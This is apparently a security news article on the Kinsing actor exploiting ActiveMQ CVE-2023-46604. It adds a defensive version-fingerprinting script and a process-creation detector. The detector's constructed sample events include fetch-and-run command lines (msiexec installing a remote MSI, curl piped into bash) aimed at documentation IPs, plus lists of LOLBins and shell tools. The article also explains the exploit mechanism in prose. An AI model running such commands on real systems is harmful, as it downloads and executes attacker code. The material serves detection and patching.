The AhnLab Security Intelligence Center (ASEC) has confirmed that the Kinsing threat actor — also known as H2Miner — continues to actively exploit known vulnerabilities, particularly CVE-2023-46604 in Apache ActiveMQ, to distribute cryptocurrency miners and remote-access tools across both Linux and Windows systems.
The campaign has recently expanded beyond its usual cryptomining activity, now involving multiple post-exploitation frameworks such as Cobalt Strike, Meterpreter, and PowerShell Empire, alongside a new .NET-based backdoor named Sharpire.
First identified by Alibaba Cloud Security in 2020, Kinsing is known for targeting misconfigured or unpatched servers to deploy XMRig miners. Over the years, the group has adapted its tactics to exploit several major vulnerabilities, including Log4Shell (CVE-2021-44228), misconfigured Docker API ports, and now, ActiveMQ’s remote code execution flaw (CVE-2023-46604).
AhnLab explains: “The Kinsing threat actor targets the Docker daemon API port with a misconfiguration, while for Redis, they exploit the remote code execution vulnerability. Other cases include the Log4j vulnerability (CVE-2021-44228) and the ActiveMQ vulnerability (CVE-2023-46604).”
Aside from vulnerability exploitation, Kinsing also leverages stolen SSH credentials during lateral movement to spread malware internally across compromised networks.
CVE-2023-46604 is an unauthenticated remote code execution vulnerability in Apache ActiveMQ's OpenWire protocol, the broker's default transport on TCP port 61616. When the broker unmarshals an OpenWire command that carries a serialized class type, it instantiates the named class with a string argument without verifying that the class is actually a Throwable. An attacker can therefore name Spring's ClassPathXmlApplicationContext instead and hand it the URL of an attacker-hosted XML bean configuration, which the broker loads and acts on, running whatever process the configuration defines. The fix shipped in ActiveMQ 5.15.16, 5.16.7, 5.17.6 and 5.18.3.
AhnLab’s analysts noted that “if an unpatched Apache ActiveMQ server is exposed to the Internet, threat actors can remotely execute malicious commands and take control of the system.” The vulnerability has already been exploited by several major groups, including Andariel, HelloKitty ransomware, and Mauri ransomware, but AhnLab’s latest research highlights Kinsing’s continued and evolving use of the exploit.
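The practical check that follows from this is whether an Internet-exposed broker still advertises a pre-fix version. An OpenWire broker announces itself in the WireFormatInfo command it sends as soon as a client connects, and the advertised version lives in that command's marshalled properties map. The script below is an added example and is not AhnLab's or the ActiveMQ project's code: it builds a constructed handshake (the loose-encoded outer framing is an assumption; the properties map encoding follows ActiveMQ's MarshallingSupport layout of an int count followed by UTF-8 keys and type-tagged values), locates the ProviderVersion entry without depending on the outer framing, and compares the version against the fixed releases named above. The fetch_handshake helper is the only networked part and is not called by default.

```python
"""Fingerprint an ActiveMQ broker's advertised version from the OpenWire
WireFormatInfo handshake and decide whether it predates the CVE-2023-46604 fix.

Added example. The handshake bytes are constructed here, not captured from a
real broker; the outer framing (size prefix, type byte, magic, presence byte)
is an assumption, while the properties map mirrors MarshallingSupport."""
import re
import socket
import struct

# Fixed releases per the CVE-2023-46604 advisory, keyed by 5.x minor branch.
FIXED = {15: (5, 15, 16), 16: (5, 16, 7), 17: (5, 17, 6), 18: (5, 18, 3)}

# MarshallingSupport primitive type tags used inside the properties map.
BOOLEAN_TYPE, LONG_TYPE, STRING_TYPE = 1, 6, 9


def _write_utf(s: str) -> bytes:
    """Java DataOutput.writeUTF: big-endian short length, then the bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def marshal_primitive_map(props: dict) -> bytes:
    """Encode a properties map: int count, then UTF key + type-tagged value."""
    out = struct.pack(">i", len(props))
    for key, val in props.items():
        out += _write_utf(key)
        if isinstance(val, bool):               # bool must be tested before int
            out += bytes([BOOLEAN_TYPE, int(val)])
        elif isinstance(val, int):              # e.g. MaxInactivityDuration (long)
            out += bytes([LONG_TYPE]) + struct.pack(">q", val)
        else:
            out += bytes([STRING_TYPE]) + _write_utf(str(val))
    return out


def build_wireformatinfo(version: str) -> bytes:
    """Constructed WireFormatInfo frame (loose encoding assumed):
    [int size][type 0x01]["ActiveMQ"][int wire version][present][int len][map]."""
    props = marshal_primitive_map({
        "TcpNoDelayEnabled": True,
        "MaxInactivityDuration": 30000,
        "ProviderName": "ActiveMQ",
        "ProviderVersion": version,
    })
    body = (b"\x01" + b"ActiveMQ" + struct.pack(">i", 12)
            + b"\x01" + struct.pack(">i", len(props)) + props)
    return struct.pack(">i", len(body)) + body


def find_provider_version(frame: bytes):
    """Locate the UTF-marshalled 'ProviderVersion' key followed by a STRING_TYPE
    value anywhere in the frame, so tight vs loose outer framing does not matter."""
    key = _write_utf("ProviderVersion")
    i = frame.find(key)
    if i < 0:
        return None
    p = i + len(key)
    if len(frame) < p + 3 or frame[p] != STRING_TYPE:
        return None
    (n,) = struct.unpack(">H", frame[p + 1:p + 3])
    return frame[p + 3:p + 3 + n].decode("utf-8", "replace")


def parse_version(v: str):
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", v or "")
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(version: str):
    """True if a 5.x version predates its branch's fix, False if at/after it,
    None for anything the advisory does not enumerate (e.g. 6.x): consult the
    advisory rather than assuming."""
    t = parse_version(version)
    if t is None or t[0] != 5:
        return None
    if t[1] < 15:
        return True                      # everything before 5.15.16
    if t[1] > 18:
        return None
    return t < FIXED[t[1]]


def fetch_handshake(host: str, port: int = 61616, timeout: float = 5.0) -> bytes:
    """Read the broker's unsolicited WireFormatInfo; networked, not run by default."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(4096)


if __name__ == "__main__":
    for v in ("5.18.2", "5.18.3", "5.15.12", "5.17.6"):
        seen = find_provider_version(build_wireformatinfo(v))
        print(f"{seen:>8}  vulnerable={is_vulnerable(seen)}")
```

To check a live host, replace the constructed frame with `fetch_handshake(host)`; only the ProviderVersion lookup and the branch comparison are needed, which is why the finder does not parse the outer framing. A version string is a screening signal, not proof of exposure, since a patched broker behind a proxy or with OpenWire disabled can still advertise an old number in unusual deployments.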
In recent attacks observed in South Korea, Kinsing has deployed a chain of downloader malware to deliver secondary payloads. The infection begins when the vulnerable ActiveMQ Java process loads the attacker's XML configuration file, which spawns msiexec.exe to download and install MSI-based malware. These "stager" components establish persistence and connect back to the attacker's infrastructure for further payload delivery.
The Kinsing operation continues to maintain cross-platform capabilities. In addition to the Windows-based malware chain, AhnLab identified a Bash script targeting Linux environments, designed to configure the XMRig miner for illicit cryptocurrency mining. The script modifies the miner’s configuration file to include Kinsing’s wallet address, as confirmed by AhnLab’s telemetry and previous Fortinet research.
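Both halves of this chain share one telemetry signature: the broker's JVM, which in normal operation does not launch installers or shells, suddenly becoming the parent of msiexec.exe on Windows or of a shell or downloader on Linux. The detection logic below is an added example and is not AhnLab's or Kinsing's code. It runs over constructed process-creation records in a Sysmon-like shape (the field names are this example's own, not a vendor schema), identifies an ActiveMQ broker by its java parent command line, and labels the Windows msiexec-from-URL chain from the paragraph above as well as the Linux shell variant; the IP addresses in the samples are documentation ranges and are constructed, not observed indicators.

```python
"""Flag an ActiveMQ broker JVM spawning an installer, LOLBin, shell or fetcher.

Added example over constructed process-creation records; not vendor code.
Field names, hostnames, paths and URLs below are this example's assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / auditd EXECVE shape)."""
    host: str
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str


URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
JAVA_BINARIES = {"java", "java.exe", "javaw.exe"}
# Children a broker JVM has no reason to launch during normal operation.
WINDOWS_LOLBINS = {"msiexec.exe", "powershell.exe", "cmd.exe", "certutil.exe",
                   "bitsadmin.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
LINUX_SHELLS_AND_FETCHERS = {"sh", "bash", "dash", "curl", "wget",
                             "python", "python3", "perl"}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_activemq_broker(parent_image: str, parent_cmdline: str) -> bool:
    """A JVM whose command line references ActiveMQ (activemq.jar or
    org.apache.activemq.console.Main) is treated as the broker process."""
    return (_basename(parent_image) in JAVA_BINARIES
            and "activemq" in parent_cmdline.lower())


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a finding label for suspicious broker children, else None."""
    if not is_activemq_broker(ev.parent_image, ev.parent_cmdline):
        return None
    child = _basename(ev.image)
    has_url = URL_RE.search(ev.cmdline) is not None
    if child == "msiexec.exe" and has_url:
        return "activemq_java_spawns_msiexec_remote_url"   # the Windows stager chain
    if child in WINDOWS_LOLBINS:
        return "activemq_java_spawns_windows_lolbin"
    if child in LINUX_SHELLS_AND_FETCHERS:
        return ("activemq_java_spawns_shell_downloader" if has_url
                else "activemq_java_spawns_shell")
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    findings = []
    for ev in events:
        label = classify(ev)
        if label:
            findings.append((ev.host, label))
    return findings


# Constructed sample telemetry: two malicious chains and two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent("win-mq-01",
              r"C:\Program Files\Java\jdk-17\bin\java.exe",
              r'"C:\Program Files\Java\jdk-17\bin\java.exe" -Xms64M -classpath '
              r'"C:\apache-activemq-5.18.2\bin\activemq.jar" '
              r"org.apache.activemq.console.Main start",
              r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://198.51.100.23/update.msi /q"),
    ProcEvent("lnx-mq-02",
              "/usr/lib/jvm/java-11-openjdk-amd64/bin/java",
              "/usr/lib/jvm/java-11-openjdk-amd64/bin/java -Xms64M -jar "
              "/opt/apache-activemq-5.17.3/bin/activemq.jar start",
              "/bin/sh",
              'sh -c "curl -s http://198.51.100.7/k.sh | bash"'),
    # Benign: msiexec with a URL, but launched by a user shell, not the broker.
    ProcEvent("win-ws-07",
              r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://vendor.example/tool.msi"),
    # Benign: a different Java service legitimately running a shell command.
    ProcEvent("lnx-ci-03",
              "/usr/bin/java", "java -jar /opt/jenkins/jenkins.war",
              "/bin/sh", 'sh -c "git fetch --all"'),
]


if __name__ == "__main__":
    for host, label in scan(SAMPLE_EVENTS):
        print(f"{host}: {label}")
```

The parent check is the load-bearing part: msiexec fetching from a URL or sh piping curl into bash is common enough elsewhere that alerting on the child alone would drown the signal, whereas a broker JVM doing either is rare enough to page on. Tune JAVA_BINARIES and the "activemq" marker to how the broker is actually launched in your estate (wrapper binaries or custom service names will otherwise hide it).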
Perhaps the most notable finding in AhnLab's report is the identification of Sharpire, a backdoor written in .NET that acts as an agent for PowerShell Empire, an open-source post-exploitation framework. Sharpire expands Kinsing's toolkit for remote control, reconnaissance, and lateral movement.
AhnLab’s analysis shows that Sharpire can execute PowerShell commands, manage files, query network configurations, and even reboot or shut down compromised systems.
The malware supports over a dozen command functions, including “Execute PowerShell command,” “List directory,” “Check network configuration information,” and “Query current user.”
By integrating Cobalt Strike, Meterpreter, and Sharpire, Kinsing now exhibits capabilities more aligned with multi-stage intrusion and ransomware operators, signaling a clear escalation in threat sophistication.